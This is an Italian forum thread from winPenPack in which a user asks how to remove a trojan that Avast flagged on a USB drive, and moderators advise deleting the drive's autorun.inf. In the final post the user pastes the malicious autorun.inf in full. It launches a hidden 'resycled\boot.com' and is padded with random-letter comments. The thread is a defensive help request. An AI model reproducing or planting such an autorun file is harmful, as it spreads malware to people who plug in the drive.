Main menu

Search
Login
Signup
Links
<< Previous thread | Next thread >>   
[Spostato] Cavallo di troia win32: Fasec

Author Post
volk
Mon 29 Dec 2008 - 20:06
online
Registered Member #15897
Joined: Fri 19 Dec 2008 - 15:49
Posts: 3

Un saluto e un augurio di buone feste a tutti.
Avrei preferito presentarmi in un altro modo ma aimè ho da segnalare un problema.
Avast! mi segnala il cavallo di troia in oggetto sulla pen drive dove ho installato l'ultima versione del winpenpak launcher personal. Come faccio per eliminarlo?.
Grazie.

[ Edited Mon 29 Dec 2008 - 20:10 ]
Back to top
Danix
Mon 29 Dec 2008 - 20:09

online

Registered Member #1
Joined: Fri 29 Dec 2006 - 05:38
Location: Sassari
Posts: 12956
Benvenuto su winPenPack
Su quale software (o su quale file) viene segnalato?
Back to top
Website
volk
Mon 29 Dec 2008 - 20:11
online
Registered Member #15897
Joined: Fri 19 Dec 2008 - 15:49
Posts: 3
Ecco il percorso del nome del file G:\resycled\boot.com
Back to top
Danix
Mon 29 Dec 2008 - 20:17

online

Registered Member #1
Joined: Fri 29 Dec 2006 - 05:38
Location: Sassari
Posts: 12956
Non credo proprio che quel file abbia a che fare con winPenPack, ma piuttosto (o probabilmente) col tuo pc -Link-

Cancella il file autorun.inf che trovi nella root della pendrive.
(abilita la visualizzazione di cartelle e file nascosti da "Opzioni cartella" di Windows)


[ Edited Mon 29 Dec 2008 - 20:20 ]
Back to top
Website
grangas
Mon 29 Dec 2008 - 20:19

online
Registered Member #4479
Joined: Tue 01 May 2007 - 23:51
Location: Saludecio (RN)
Posts: 445
Ciao Volk
Il tuo virus, o presunto tale, sembra essere nel cestino della tua pen drive e non all'interno del wPP.
Quel file potrebbe essere arivato tramite altri file/programmi oppure anche solo per aver collegato la penna ad un pc infetto
Back to top
volk
Mon 29 Dec 2008 - 20:24
online
Registered Member #15897
Joined: Fri 19 Dec 2008 - 15:49
Posts: 3
Il file autorun.ini creato è
[autorun]
;fpenloxyilvgwjkqocabtepyvhsijwkutvfdkqufusmetcunymfwlkrauznsqkfzdnazpqbuqhqilybymcoxdfuixfrwodzvbtztfilq
shellexecute="resycled\boot.com g:"
;hsjfebduvwuyrxssgwhxpkcsarbjkryolqdnhelzbengxfbvp
shell\Open\command="resycled\boot.com g:"
;jrkb

E' sicuramente è il mio pc è infetto.
Cercero di rimediare. Grazie

[ Edited Mon 29 Dec 2008 - 20:26 ]
Back to top

Moderators: Danix, Taf, Rcs, Energy, zandet2, ZioZione, Admin, LordJim60

Jump:     Back to top

Syndicate this thread: rss 0.92 Syndicate this thread: rss 2.0 Syndicate this thread: RDF
Powered by e107 Forum System